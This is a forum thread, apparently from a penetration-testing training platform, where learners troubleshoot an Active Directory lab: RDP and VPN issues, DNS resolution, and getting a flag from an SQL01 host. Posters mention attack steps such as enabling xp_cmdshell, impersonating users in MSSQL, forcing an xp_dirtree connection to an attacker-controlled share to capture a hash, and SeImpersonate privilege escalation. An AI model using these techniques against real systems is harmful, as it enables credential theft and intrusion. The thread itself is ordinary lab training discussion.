Active Directory - Skills Assessment II

Evil-Winrm does not cut it for extended AD enumeration.
Your issues with RDP-connectivity are most likely VPN-related (also in Pwnbox).
Renew you VPN to a different region, clear your browser and give it another try!

1 Like

Yes. I spent 2 days trying to RDP through the Parrot VM and also to work the lab without RDP. I then tried OpenVPN and RDP worked fine from my Kali machine at home! It seems that Pwnbox is misconfigured (x11 problem) so OpenVPN is the way to go. I’ve been using Pwnbox up until this point with many headaches. From now on I’m using OpenVPN.

Okay. So my RDP problem was an issue with the Parrot VM. By using OpenVPN on my Kali box at home, I didn’t have any issues access the lab. It was easy peasy once I could RDP into MS01.

:call_me_hand:

Hit me up if you get stuck! I wrote up a complete walkthrough.

If You encounter this kind of a problem it’s mostly due to not forwarding Your X’s.

Exit from current SSH, and then reconnect with -X parameter ie. ssh user@127.0.0.1 -X
This should let You RDP from within SSH connection :wink:

1 Like

@iamjaydee Thank you! I will investigate your suggestion. :call_me_hand:

So did you find any way?

Hello, guys. I am trying to connect to SQL01 with mssqlclient.py
mssqlclient.py -p 1433 SQLEXPRESS/n****:'D***_****_******'@SQL01 -windows-auth
but receiving Temporary failure in name resolution. Could somebody tell me what I am doing wrong?

Hi, I need help on question 7 → " Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host."

I have tried:

  • Enable xp_cmdshell to execute commands, but I don’t have access to access C:\UsersAdministratorDesktop.
  • I have tried impersonating another user within MSSQL, but I get no results. I have used the commands:

image

  • Also, I mounted a share on the attacker machine to capture the hash and from MSSQL I ran “EXEC master…xp_dirtree '\IP_attacker\share”, but to no avail.

What else could you do with the SeImpersonate Privilege?
Have a look at Privilege Escalation!

1 Like

Your Kali Box has to know how to resolve the address of SQL01.

You might try editing resolv.conf

$ cat /etc/resolv.conf 

#nameserver 192.168.195.2
domain inlanefreight.local
domain localdomain
search localdomain
nameserver <DC IP>

Thank you @Rapunzel3000 . In case it helps anyone, I have read the section “SeImpersonate and SeAssignPrimaryToken” of the module “Windows Privilege Escalation”. It is important to know if Windows Server is 2016 or 2019.

hi 19delta4u,experiencing the same issue,either through the OpenVPN with the display variable